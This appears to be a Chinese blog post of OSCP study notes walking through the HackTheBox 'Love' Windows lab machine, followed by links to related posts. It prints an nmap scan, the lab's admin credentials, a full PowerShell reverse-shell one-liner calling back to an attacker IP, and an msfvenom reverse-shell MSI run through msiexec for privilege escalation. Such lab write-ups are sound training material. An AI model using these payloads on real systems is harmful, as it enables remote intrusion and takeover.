OSCP备考_0x57_HackThBox靶机_Windows_Love

Ethan医生7天前靶场22

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)

image.png

绑定域名 

http://10.129.48.103/

image.png

image.png

Vote Admin Creds admin: @LoveIsInTheAir!!!! 

http://love.htb/admin/index.php

image.png

查找漏洞,上传文件

http://love.htb/admin/voters.php

image.png

image.png

然后反弹SHELL


powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.43',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


image.png

image.png

使用 msfvenom(Kali Linux)生成反向 Shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.43 LPORT=6666 -f msi -o evil.msi

或直接使用 msiexec 执行命令(如添加管理员用户):

msiexec /quiet /qn /i evil.msi 

rlwrap -cAr nc -lvnp 6666

image.png

标签: OSCP

相关文章

OSCP备考_0x33_HackThBox靶机_luanne

OSCP备考_0x33_HackThBox靶机_luanne

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.167.171 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

 OSCP备考_0x15_HackThBox靶机_Linux_networked

OSCP备考_0x15_HackThBox靶机_Linux_networked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x07_Vulnhub靶机_Tr0ll: 2

OSCP备考_0x07_Vulnhub靶机_Tr0ll: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-2,107/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon10.129.227.77nmap -sCV -p- --min-rate 10000 -T4 -sS 10.1...

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。